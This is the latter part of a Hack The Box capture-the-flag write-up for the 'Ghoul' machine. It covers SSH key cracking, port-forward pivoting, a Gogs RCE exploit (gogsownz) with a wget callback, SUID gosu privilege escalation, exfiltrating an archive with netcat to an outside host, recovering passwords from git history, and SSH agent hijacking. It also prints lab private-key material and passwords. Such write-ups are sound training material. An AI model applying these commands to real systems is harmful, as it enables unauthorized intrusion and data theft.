1YeVA0RwHu4S1IObji9RP1DfAMid0pCSnvAoFd/EArnAtwgPFOLqvPZj5j+LjFPL

sOHUW+N+cY24HpH1UVTEWAkgkiGz89/bF98c1kpoLEkS2sjU+jVONTBlLeRmqcDJ

YnCcPXrkT6oC/wctYlM141hrctWRyjY+f0IwREDCv8TM1aAAY3vaZUdMfy71Q3DE

PO4S5ivuruwGeCQmGhEmWBSm0PwpGd0pNbHv+zs0TH+2lmAn8O3R2UrcCu0TxhmH

oW0mQbl+2u+xVB5ijjqtm0CFLsXiX17FdCbMp1huCMTx9TuY6GMeSsN6X7exTIcx

DEvpUHREXgtVqBdNX1QxIoMIxpK2qlMfPYtGikthba5fjBof0b/8lJvtZuoWrJ9R

L0HWW16fkbjEXSrwdEb5zjntCxJKLWmKgiFfaoJ9/L1yhc12w/EQjpUxGkFdyeMs

7QyGClGpKFU4GQvKMQYei57sNk/ZUPgPWizNfuuU/8qBhKXG9JB2R3GWFTEpxzO8

luTnBEUn8Se3cLNrBQ05LIVk2jRYhUE6IBWFYvhjQUGChZTZjSlxNR55t6olYj2M

JBxtT5E2YDhSk4nB21IlTIurggP9pNm+PtTTt2o0jzOD5uOHko6VzGz4Ukvbo0gZ

/zyr4fR7OhGG0grtKxV1s2PpDt9bkhnMXJ+I8zZVN9INHUsoE5IXtpKKJOCQYFjQ

v+EB7xAmWe1q9xSgLSq6I1fWJrYqjkOd9TpqVPNoyTGWM1ELYXyHah8vZi+0BFzh

-----END RSA PRIVATE KEY-----



I tried to crack the key but I couldn’t find the password in rockyou . Then I remembered /secret.php when Noro asked Kaneki for access and Kaneki replied with a weird string that looked like a password ( ILoveTouka ) :



I tried that as the key password and it worked :

1

2

3

4

5

6

root@kali:~/Desktop/HTB/boxes/ghoul# nano kaneki.key

root@kali:~/Desktop/HTB/boxes/ghoul# chmod 600 kaneki.key

root@kali:~/Desktop/HTB/boxes/ghoul# ssh -i kaneki.key kaneki@ghoul.htb

Enter passphrase for key 'kaneki.key':

Last login: Fri Oct 4 11:40:26 2019 from 10.10.15.168

kaneki@Aogiri:~$



Since I’m going to tunnel stuff I echoed my public key to /root/.ssh/authorized_keys and I got ssh as root :



I forwarded port 22 on 172.20.0.150 then I sshed to the box as kaneki_pub :

1

2

3

root@kali:~/Desktop/HTB/boxes/ghoul# ssh -i id_rsa -L 2020:172.20.0.150:22 root@ghoul.htb

Last login: Fri Oct 4 13:13:00 2019 from 10.10.xx.xx

root@Aogiri:~#



1

2

3

4

root@kali:~/Desktop/HTB/boxes/ghoul# ssh kaneki_pub@localhost -p 2020 -i ./kaneki.key

Enter passphrase for key './kaneki.key':

Last login: Fri Oct 4 11:35:41 2019 from 172.20.0.10

kaneki_pub@kaneki-pc:~$



RCE in gogs, Pivoting from kaneki-pc to git

There was a text file called to-do.txt in the home directory :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

kaneki_pub@kaneki-pc:~$ ls -la

total 40

drwx------ 3 kaneki_pub kaneki_pub 4096 Dec 16 2018 .

drwxr-xr-x 1 root root 4096 Dec 16 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rwx------ 1 kaneki_pub kaneki_pub 220 Dec 16 2018 .bash_logout

-rwx------ 1 kaneki_pub kaneki_pub 3771 Dec 16 2018 .bashrc

-rwx------ 1 kaneki_pub kaneki_pub 807 Dec 16 2018 .profile

drwx------ 2 kaneki_pub kaneki_pub 4096 Dec 16 2018 .ssh

-rw------- 1 kaneki_pub kaneki_pub 3139 Dec 16 2018 .viminfo

-rw-r--r-- 1 kaneki_pub kaneki_pub 165 Dec 16 2018 .wget-hsts

-rw-r--r-- 1 root root 44 Dec 16 2018 to-do.txt

kaneki_pub@kaneki-pc:~$ cat to-do.txt

Give AogiriTest user access to Eto for git.

kaneki_pub@kaneki-pc:~$



On Aogiri there was a hint about a vulnerability in gogs :

1

2

root@Aogiri:/home/kaneki# cat note.txt

Vulnerability in Gogs was detected. I shutdown the registration function on our server, please ensure that no one gets access to the test accounts.



A painless self-hosted Git service. -gogs.io

I checked the interfaces and there was a new subnet :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

kaneki_pub@kaneki-pc:~$ ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 172.20.0.150 netmask 255.255.0.0 broadcast 172.20.255.255

ether 02:42:ac:14:00:96 txqueuelen 0 (Ethernet)

RX packets 8644 bytes 924940 (924.9 KB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 5908 bytes 2135441 (2.1 MB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0



eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 172.18.0.200 netmask 255.255.0.0 broadcast 172.18.255.255

ether 02:42:ac:12:00:c8 txqueuelen 0 (Ethernet)

RX packets 1650 bytes 2723948 (2.7 MB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 1684 bytes 352910 (352.9 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0



lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0

loop txqueuelen 1000 (Local Loopback)

RX packets 25 bytes 1661 (1.6 KB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 25 bytes 1661 (1.6 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0



kaneki_pub@kaneki-pc:~$



So I ran another ping sweep :

1

2

3

4

kaneki_pub@kaneki-pc:~$ for i in {1..255}; do ping -c 1 172.18.0.$i; done | grep 'ttl='

64 bytes from 172.18.0.1: icmp_seq=0 ttl=64 time=0.125 ms

64 bytes from 172.18.0.2: icmp_seq=0 ttl=64 time=0.146 ms

64 bytes from 172.18.0.200: icmp_seq=0 ttl=64 time=0.054 ms



And again I downloaded nc to scan the discovered host ( 172.18.0.200 ) :

1

2

3

4

5

6

7

8

9

kaneki_pub@kaneki-pc:/tmp$ wget http://172.20.0.10:8888/nc

--2019-10-04 13:37:59-- http://172.20.0.10:8888/nc

Connecting to 172.20.0.10:8888... connected.

HTTP request sent, awaiting response... 200 OK

Length: 959800 (937K) [application/octet-stream]

Saving to: ‘nc’

nc 100%[=====================================================================================================================>] 937.30K --.-KB/s in 0.006s

2019-10-04 13:37:59 (161 MB/s) - ‘nc’ saved [959800/959800]

kaneki_pub@kaneki-pc:/tmp$



1

2

3

4

kaneki_pub@kaneki-pc:/tmp$ ./nc -zv 172.18.0.2 1-10000

cuff_web_1.cuff_default [172.18.0.2] 22 (ssh) open

cuff_web_1.cuff_default [172.18.0.2] 3000 open

kaneki_pub@kaneki-pc:/tmp$



Port 3000 is the default port for gogs , I forwarded it to Aogori then from Aogiri to my machine :

1

2

3

4

root@Aogiri:~# ssh -L 3000:172.18.0.2:3000 -i /home/kaneki/.ssh/id_rsa kaneki_pub@172.20.0.150

Enter passphrase for key '/home/kaneki/.ssh/id_rsa':

Last login: Fri Oct 4 13:38:45 2019 from 172.20.0.10

kaneki_pub@kaneki-pc:~$



1

2

3

4

root@kali:~/Desktop/HTB/boxes/ghoul# ssh -L 3000:127.0.0.1:3000 -i kaneki.key kaneki@ghoul.htb

Enter passphrase for key 'kaneki.key':

Last login: Fri Oct 4 13:42:14 2019 from 10.10.15.168

kaneki@Aogiri:~$





We already have the username : AogiriTest . I tried the password I got from tomcat-users.xml ( test@aogiri123 ) and it worked :





The hint said that this version of gogs was vulnerable, so I cloned gogsownz and tried to exploit the RCE vulnerability :

1

2

3

4

5

6

7

8

root@kali:~/Desktop/HTB/boxes/ghoul# git clone https://github.com/TheZ3ro/gogsownz.git

Cloning into 'gogsownz'...

remote: Enumerating objects: 11, done.

remote: Counting objects: 100% (11/11), done.

remote: Compressing objects: 100% (11/11), done.

remote: Total 11 (delta 2), reused 5 (delta 0), pack-reused 0

Unpacking objects: 100% (11/11), done.

root@kali:~/Desktop/HTB/boxes/ghoul#



1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

root@kali:~/Desktop/HTB/boxes/ghoul/gogsownz# python3 gogsownz.py -v http://127.0.0.1:3000/ -C 'AogiriTest':'test@aogiri123' -n i_like_gogits --rce 'wget http://10.10.xx.xx' --cleanup

[i] Starting Gogsownz on: http://127.0.0.1:3000

[+] Loading Gogs homepage

[i] Gogs Version installed: © 2018 Gogs Version: 0.11.66.0916

[i] The Server is redirecting on the login page. Probably REQUIRE_SIGNIN_VIEW is enabled so you will need an account.

[+] Performing login

[+] Logged in sucessfully as AogiriTest

[+] Got UserID 2

[+] Repository created sucessfully

[i] Exploiting authenticated PrivEsc...

[+] Uploading admin session as repository file

[+] Uploaded successfully.

[+] Committing the Admin session

[+] Committed sucessfully

[+] Removing Repo evidences

[+] Repo removed sucessfully

[i] Signed in as kaneki, is admin True

[i] Current session cookie: '638cb471cd001337'

[+] Got UserID 1

[+] Repository created sucessfully

[+] Setting Git hooks

[+] Git hooks set sucessfully

[+] Fetching last commit...

[+] Got last commit

[+] Triggering the RCE with a new commit

[+] Committed sucessfully

[i] Performed RCE successfully

[i] Waiting 10 seconds before cleaning up...

[+] Removing Repo evidences

[+] Repo removed sucessfully

[i] Done!

root@kali:~/Desktop/HTB/boxes/ghoul/gogsownz#



1

2

3

root@kali:~/Desktop/HTB/boxes/ghoul# python -m SimpleHTTPServer 80

Serving HTTP on 0.0.0.0 port 80 ...

10.10.10.101 - - [04/Oct/2019 16:41:19] "GET / HTTP/1.1" 200 -



It worked, time to get a reverse shell :



Privilege Escalation from git to root, Getting aogiri-app.7z

Unfortunately python wasn’t installed on the host so I had to get ssh for a better shell.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

cd /home

ls -la

total 8

drwxr-xr-x 1 root root 4096 Oct 4 14:45 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

lrwxrwxrwx 1 root root 9 Oct 4 14:45 git -> /data/git

cd git

ls -la

total 20

drwxr-xr-x 4 git git 4096 Oct 4 14:45 .

drwxr-xr-x 5 git git 4096 Dec 13 2018 ..

lrwxrwxrwx 1 git git 9 Dec 29 2018 .bash_history -> /dev/null

-rw-r--r-- 1 git git 71 Oct 4 14:45 .gitconfig

drwx------ 2 git git 4096 Dec 13 2018 .ssh

drwxr-xr-x 4 git git 4096 Dec 13 2018 gogs-repositories

cd .ssh

ls -la

total 12

drwx------ 2 git git 4096 Dec 13 2018 .

drwxr-xr-x 4 git git 4096 Oct 4 14:45 ..

-rw------- 1 git git 23 Dec 13 2018 environment

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsiPbWC8feNW7o6emQUk12tFOcucqoS/nnKN/LM3hCtPN8r4by8Ml1IR5DctjeurAmlJtXcn8MqlHCRbR6hZKydDwDzH3mb6M/gCYm4fD9FppbOdG4xMVGODbTTPV/h2Lh3ITRm+xNHYDmWG84rQe++gJImKoREkzsUNqSvQv4rO1RlO6W3rnz1ySPAjZF5sloJ8Rmnk+MK4skfj00Gb2mM0/RNmLC/rhwoUC+Wh0KPkuErg4YlqD8IB7L3N/UaaPjSPrs2EDeTGTTFI9GdcT6LIaS65CkcexWlboQu3DDOM5lfHghHHbGOWX+bh8VHU9JjvfC8hDN74IvBsy120N5 kaneki@kaneki-pc" > authorized_keys

ls -la

total 16

drwx------ 2 git git 4096 Oct 4 14:52 .

drwxr-xr-x 4 git git 4096 Oct 4 14:45 ..

-rw-r--r-- 1 git git 398 Oct 4 14:52 authorized_keys

-rw------- 1 git git 23 Dec 13 2018 environment

cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsiPbWC8feNW7o6emQUk12tFOcucqoS/nnKN/LM3hCtPN8r4by8Ml1IR5DctjeurAmlJtXcn8MqlHCRbR6hZKydDwDzH3mb6M/gCYm4fD9FppbOdG4xMVGODbTTPV/h2Lh3ITRm+xNHYDmWG84rQe++gJImKoREkzsUNqSvQv4rO1RlO6W3rnz1ySPAjZF5sloJ8Rmnk+MK4skfj00Gb2mM0/RNmLC/rhwoUC+Wh0KPkuErg4YlqD8IB7L3N/UaaPjSPrs2EDeTGTTFI9GdcT6LIaS65CkcexWlboQu3DDOM5lfHghHHbGOWX+bh8VHU9JjvfC8hDN74IvBsy120N5 kaneki@kaneki-pc



1

2

3

4

5

6

7

8

9

10

11

12

13

kaneki_pub@kaneki-pc:~$ ssh -i .ssh/id_rsa git@172.18.0.2

Enter passphrase for key '.ssh/id_rsa':

Welcome to Alpine!



The Alpine Wiki contains a large amount of how-to guides and general

information about administrating Alpine systems.

See <http://wiki.alpinelinux.org>.



You can setup the system with the command: setup-alpine



You may change this message by editing /etc/motd.



3713ea5e4353:~$



I couldn’t find anything useful so I had to escalate to root. After some regular enumeration I checked the suid binaries :

1

2

3

4

5

6

7

8

9

10

11

3713ea5e4353:~$ find / -perm -4000 2>/dev/null

/usr/bin/passwd

/usr/bin/gpasswd

/usr/bin/chage

/usr/bin/chfn

/usr/bin/chsh

/usr/bin/newgrp

/usr/bin/expiry

/usr/sbin/gosu

/bin/su

3713ea5e4353:~$



gosu was interesting so I checked it and found that it executes commands as other users even root, so I executed bash as root :

1

2

3

4

5

6

7

8

9

10

11

12

13

3713ea5e4353:~$ gosu

Usage: gosu user-spec command [args]

ie: gosu tianon bash

gosu nobody:root bash -c 'whoami && id'

gosu 1000:1 id



gosu version: 1.10 (go1.7.1 on linux/amd64; gc)

license: GPL-3 (full text at https://github.com/tianon/gosu)



3713ea5e4353:~$ gosu root bash

3713ea5e4353:/data/git# whoami

root

3713ea5e4353:/data/git#



I checked the root directory and found a bash script called session.sh :

1

2

3

4

5

6

7

8

9

3713ea5e4353:~# ls -la

total 128

drwx------ 1 root root 4096 Dec 29 2018 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .ash_history -> /dev/null

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rw-r--r-- 1 root root 117507 Dec 29 2018 aogiri-app.7z

-rwxr-xr-x 1 root root 179 Dec 16 2018 session.sh

3713ea5e4353:~#



1

2

3

4

5

6

7

8



while true

do

sleep 300

rm -rf /data/gogs/data/sessions

sleep 2

curl -d 'user_name=kaneki&password=12345ILoveTouka!!!' http://172.18.0.2:3000/user/login

done



This script was executed periodically to terminate the active sessions, I saved the password because we may need it later.

The other thing was a 7z archive called aogiri-app.7z , I used nc to download it on my box :

1

2

3

4

3713ea5e4353:~# nc -w 3 10.10.xx.xx 1338 < aogiri-app.7z

3713ea5e4353:~# md5sum aogiri-app.7z

88e134a69f8c2f96de31581a52895c07 aogiri-app.7z

3713ea5e4353:~#



1

2

3

4

root@kali:~/Desktop/HTB/boxes/ghoul# nc -lp 1338 > aogiri-app.7z

root@kali:~/Desktop/HTB/boxes/ghoul# md5sum aogiri-app.7z

88e134a69f8c2f96de31581a52895c07 aogiri-app.7z

root@kali:~/Desktop/HTB/boxes/ghoul#



Searching Through git Commits, Privilege Escalation on kaneki-pc

I created a directory and called it aogiri-app then I extracted the archive there :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

root@kali:~/Desktop/HTB/boxes/ghoul# mkdir aogiri-app

root@kali:~/Desktop/HTB/boxes/ghoul# cd aogiri-app/

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app# cp ../aogiri-app.7z .

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app# 7za x ./aogiri-app.7z



7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21

p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on)



Scanning the drive for archives:

1 file, 117507 bytes (115 KiB)



Extracting archive: ./aogiri-app.7z

--

Path = ./aogiri-app.7z

Type = 7z

Physical Size = 117507

Headers Size = 4011

Method = LZMA2:192k

Solid = +

Blocks = 1



Everything is Ok



Folders: 114

Files: 125

Size: 154976

Compressed: 117507

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app# ls -la

total 128

drwxr-xr-x 3 root root 4096 Oct 4 17:00 .

drwxr-xr-x 4 root root 4096 Oct 4 16:59 ..

-rw-r--r-- 1 root root 117507 Oct 4 17:00 aogiri-app.7z

drwxr-xr-x 5 root root 4096 Dec 29 2018 aogiri-chatapp

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app#



By looking at the extracted files we’ll see that it’s a git repository :

1

2

3

4

5

6

7

8

9

10

11

12

13

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app/aogiri-chatapp# ls -la

total 52

drwxr-xr-x 5 root root 4096 Dec 29 2018 .

drwxr-xr-x 3 root root 4096 Oct 4 17:00 ..

drwxr-xr-x 8 root root 4096 Dec 29 2018 .git

-rw-r--r-- 1 root root 268 Dec 29 2018 .gitignore

drwxr-xr-x 3 root root 4096 Dec 29 2018 .mvn

-rwxr-xr-x 1 root root 9113 Dec 29 2018 mvnw

-rw-r--r-- 1 root root 5810 Dec 29 2018 mvnw.cmd

-rw-r--r-- 1 root root 2111 Dec 29 2018 pom.xml

-rw-r--r-- 1 root root 124 Dec 29 2018 README.md

drwxr-xr-x 4 root root 4096 Dec 29 2018 src

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app/aogiri-chatapp#



And honestly this was a very big rabbit hole, I kept searching through the application code (it was useless and I couldn’t get anything from it) for a long time while it was actually about the git repository itself.

Let’s check the reflog to get the commits :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app/aogiri-chatapp# git reflog

647c5f1 (HEAD -> master, origin/master) HEAD@{0}: commit: changed service

b43757d HEAD@{1}: commit: added mysql deps

b3752e0 HEAD@{2}: reset: moving to b3752e0

0d426b5 HEAD@{3}: reset: moving to 0d426b5

e29ad43 HEAD@{4}: reset: moving to HEAD^

0d426b5 HEAD@{5}: reset: moving to HEAD

0d426b5 HEAD@{6}: reset: moving to origin/master

0d426b5 HEAD@{7}: commit: update dependencies

e29ad43 HEAD@{8}: commit: added service

b3752e0 HEAD@{9}: commit: noro stop doing stupid shit

813e0a5 HEAD@{10}: commit: hello world!

ed5a88c HEAD@{11}: commit: mysql support

51d2c36 HEAD@{12}: commit: added readme

bec96aa HEAD@{13}: commit: updated dependencies

8b74520 HEAD@{14}: commit (initial): update readme



I checked each commit and in one of the commits ( 0d426b5 ) I found some passwords :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app/aogiri-chatapp# git show 0d426b5

commit 0d426b533d4f1877f8a114620be8a1294f34ab71

Author: kaneki <kaneki@aogiri.htb>

Date: Sat Dec 29 11:44:50 2018 +0530



update dependencies



diff --git a/pom.xml b/pom.xml

index 92f24ee..fc1d313 100644

--- a/pom.xml

+++ b/pom.xml

@@ -48,6 +48,11 @@

<artifactId>javax.json</artifactId>

<version>1.0</version>

</dependency>

+ <dependency>

+ <groupId>mysql</groupId>

+ <artifactId>mysql-connector-java</artifactId>

+ <version>5.1.46</version>

+ </dependency>



</dependencies>



diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties

index 4cbc10b..41adeb0 100644

--- a/src/main/resources/application.properties

+++ b/src/main/resources/application.properties

@@ -1,7 +1,7 @@

server.port=8080

spring.datasource.url=jdbc:mysql://localhost:3306/db

-spring.datasource.username=kaneki

-spring.datasource.password=7^Grc%C\7xEQ?tb4

+spring.datasource.username=root

+spring.datasource.password=g_xEN$ZuWD7hJf2G

server.address=0.0.0.0



spring.jpa.properties.hibernate.dialect = org.hibernate.dialect.MySQL5InnoDBDialect



The only host that hasn’t been rooted yet is kaneki-pc so I tried the 2 passwords and 7^Grc%C\7xEQ?tb4 worked, However still no flag :

1

2

3

4

5

6

kaneki_pub@kaneki-pc:~$ su

Password:

root@kaneki-pc:/home/kaneki_pub# cd /root/

root@kaneki-pc:~# cat root.txt

You've done well to come upto here human. But what you seek doesn't lie here. The journey isn't over yet.....

root@kaneki-pc:~#



Hijacking the SSH Forward Agent, Root Flag

By checking the /tmp directory I saw some directories named ssh-RandomString :

1

2

3

4

5

6

7

8

9

10

11

root@kaneki-pc:~# cd /tmp/

root@kaneki-pc:/tmp# ls -la

total 28

drwxrwxrwt 1 root root 4096 Oct 4 15:06 .

drwxr-xr-x 1 root root 4096 Oct 4 14:45 ..

drwx------ 1 root root 4096 Dec 16 2018 ssh-1Oo5P5JuouKm

drwx------ 1 kaneki_adm kaneki_adm 4096 Dec 16 2018 ssh-FWSgs7xBNwzU

drwx------ 1 kaneki_pub kaneki 4096 Dec 16 2018 ssh-jDhFSu7EeAnz

-rw------- 1 root root 400 Oct 4 14:45 sshd-stderr---supervisor-E5awkI.log

-rw------- 1 root root 0 Oct 4 14:45 sshd-stdout---supervisor-3bRi58.log

root@kaneki-pc:/tmp#



And by checking the processes I found that there is a periodic ssh command as root to 172.18.0.1 :

1

2

3

4

5

6

7

8

9

root@kaneki-pc:/tmp# ps aux | grep ssh

root 10 0.0 0.1 72296 6116 pts/0 S 14:45 0:00 /usr/sbin/sshd -D

root 15 0.0 0.1 74656 6536 ? Ss 14:48 0:00 sshd: kaneki_pub [priv]

kaneki_+ 17 0.0 0.0 74792 4008 ? S 14:48 0:00 sshd: kaneki_pub@pts/2

root 101 0.1 0.1 74656 6572 ? Ss 15:12 0:00 sshd: kaneki_adm [priv]

kaneki_+ 103 0.0 0.0 74656 3192 ? S 15:12 0:00 sshd: kaneki_adm@pts/1

kaneki_+ 104 0.1 0.1 45188 5400 pts/1 Ss+ 15:12 0:00 ssh root@172.18.0.1 -p 2222 -t ./log.sh

root 106 0.0 0.0 13212 1020 pts/2 S+ 15:12 0:00 grep --color=auto ssh

root@kaneki-pc:/tmp#



After searching for a while I found this article which explains it very well. I cleaned the /tmp directory :

1

2

3

4

5

6

7

8

root@kaneki-pc:/tmp# rm -rf ssh-*

root@kaneki-pc:/tmp# ls -la

total 16

drwxrwxrwt 1 root root 4096 Oct 4 15:13 .

drwxr-xr-x 1 root root 4096 Oct 4 14:45 ..

-rw------- 1 root root 400 Oct 4 14:45 sshd-stderr---supervisor-E5awkI.log

-rw------- 1 root root 0 Oct 4 14:45 sshd-stdout---supervisor-3bRi58.log

root@kaneki-pc:/tmp#



Then I waited for the ssh command to get executed again. After some minutes the agent was created :

1

2

3

4

5

6

7

8

9

10

11

12

13

root@kaneki-pc:/tmp# ls -la

total 20

drwxrwxrwt 1 root root 4096 Oct 4 15:30 .

drwxr-xr-x 1 root root 4096 Oct 4 14:45 ..

drwx------ 2 kaneki_adm kaneki_adm 4096 Oct 4 15:30 ssh-X2sLvGoeXy

-rw------- 1 root root 400 Oct 4 14:45 sshd-stderr---supervisor-E5awkI.log

-rw------- 1 root root 0 Oct 4 14:45 sshd-stdout---supervisor-3bRi58.log

root@kaneki-pc:/tmp# ls -la ssh-X2sLvGoeXy/

total 12

drwx------ 2 kaneki_adm kaneki_adm 4096 Oct 4 15:30 .

drwxrwxrwt 1 root root 4096 Oct 4 15:30 ..

srwxr-xr-x 1 kaneki_adm kaneki_adm 0 Oct 4 15:30 agent.490

root@kaneki-pc:/tmp#



I quickly hijacked it :

1

2

3

root@kaneki-pc:/tmp# export SSH_AUTH_SOCK=/tmp/ssh-X2sLvGoeXy/agent.490

root@kaneki-pc:/tmp# ssh-add -l

2048 SHA256:U3NCrv1R4fOSeyIk3W0EcaAm81ETo4dcu5+FBbk3KxE /home/kaneki/.ssh/id_rsa (RSA)



Then I could ssh to 172.18.0.1 as root :



And we owned root !

That’s it , Feedback is appreciated !

Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Swagshop

Next Hack The Box write-up : Hack The Box - Writeup